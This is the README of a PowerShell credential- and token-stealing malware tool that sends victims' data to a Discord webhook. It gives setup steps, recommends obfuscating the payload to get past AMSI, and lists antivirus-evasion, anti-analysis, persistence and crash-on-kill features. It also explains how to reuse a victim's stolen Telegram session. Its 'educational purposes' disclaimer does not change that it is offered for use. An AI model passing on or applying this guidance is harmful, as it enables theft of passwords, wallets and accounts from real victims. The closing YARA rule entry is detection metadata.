Malware targeting Windows systems that utilizes PowerShell for the purpose of data exfiltration. All information collected is sent using Discord webhooks.
Important
As of 2024-02-14, PowerShell-Token-Grabber is detected by AMSI (malware-encyclopedia). You need to obfuscate the generated payload in order to use it effectively.
- Create a Webhook on your Discord Server. I recommend creating a new server.
- After creating a server go to
Edit channel
>Integrations
>Webhooks
>Create Webhook
- Copy the
Webhook URL
- Download
main.ps1
- Open
main.ps1
and replaceYOUR_WEBHOOK_HERE
in line30
with your webhook or use the builder.
Use Invoke-Obfuscation.
Or use Somalifuscator for .bat
files
- ๐ธ Obfuscation of
BAT
andPS1
files - ๐ฉ Compilation of Exe Files
- ๐ Pump/Inject the output exe file with zero-filled bytes
- GUI Builder
- Anti-Kill (Terminating the grabber will result in a system crash, indicated by a
BSoD
blue screen of death). - Mutex (single instance)
- Force UAC
- Antivirus Evasion: Disables AMSI , excluded from
Windows Defender
and blocks access to antivirus websites in hosts file. - Anti-Analysis
VMWare, VirtualBox, Sandboxes, Emulators, Debuggers, Virustotal, Any.run
- Persistence via Task Scheduler
- Extracts WiFi Passwords
- Files Stealer
2fa, backupcodes, seedphrases, passwords, privatekeys, etc.
- ๐ท Webcam & Desktop Screenshots
- Session Stealers
- VPN Clients
- Crypto Wallets
Armory | Atomic | Bitcoin | Bytecoin | Coinomi | Dash | Electrum | Ethereum | Exodus | Guarda | Jaxx | Litecoin | Monero | Zcash
- Browsers (Brave, Chrome, Firefox, Microsoft Edge, Thunderbird etc.)
- ๐ Passwords
- ๐ช Cookies
- ๐ History
- Extracts Discord Token
- Get System Information (Version, CPU, DISK, GPU, RAM, IP, Installed Apps etc.)
- List of Installed Applications
- List of Installed Antiviruses
- List of all Network Adapters
- List of Apps that Run On Startup
- List of Running Services & Applications
- All Network Information
- Extracts Product Key
- Self-Destructs After Execution (optional)
After the exfiltrated data is uploaded to your discord webhook, download the compressed file KDOT.zip
, extract it on your PC, inside that folder there will also be another subfolder Messaging Sessions
, inside this subfolder you will find the Telegram
folder.
Now, copy the tdata folder from Telegram
folder and paste it in the directory below:
%userprofile%\AppData\Roaming\Telegram Desktop
Before pasting the tdata folder, ensure that you have deleted the existing tdata folder on your PC.
Note
The other session stealers can be utilized by applying the technique above
- Open a new Elevated Powershell Console then copy & paste the contents below
$ErrorActionPreference = "SilentlyContinue"
function Cleanup {
Unregister-ScheduledTask -TaskName "KDOT" -Confirm:$False
Remove-Item -Path "$env:appdata\KDOT" -force -recurse
Remove-MpPreference -ExclusionPath "$env:APPDATA\KDOT"
Remove-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp"
$resethostsfile = @'
# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handle within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
'@
[IO.File]::WriteAllText("$env:windir\System32\Drivers\etc\hosts", $resethostsfile)
Write-Host "[~] Successfully Uninstalled !" -ForegroundColor Green
}
Cleanup
Found a bug? Have an idea? Let me know here, Please provide a detailed explanation of the expected behavior, actual behavior, and steps to reproduce, or what you want to see and how it could be done. You can be a small part of this project!
This project is licensed under the MIT License - see the LICENSE file for details
I, the creator, am not responsible for any actions, and or damages, caused by this software. You bear the full responsibility of your actions and acknowledge that this tool was created for educational purposes only. This tool's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above.
YARA Rule Info
Name : SUSP_PS1_PowerShell_Recon_Mar23_1
RULE Hash : eda1df8e3375891644fe9cac90852b0d
Description : Detects suspicious PowerShell code that performs reconnaissance tasks
Rule Link : https://valhalla.nextron-systems.com/info/rule/SUSP_PS1_PowerShell_Recon_Mar23_1
Rule Author : Florian Roth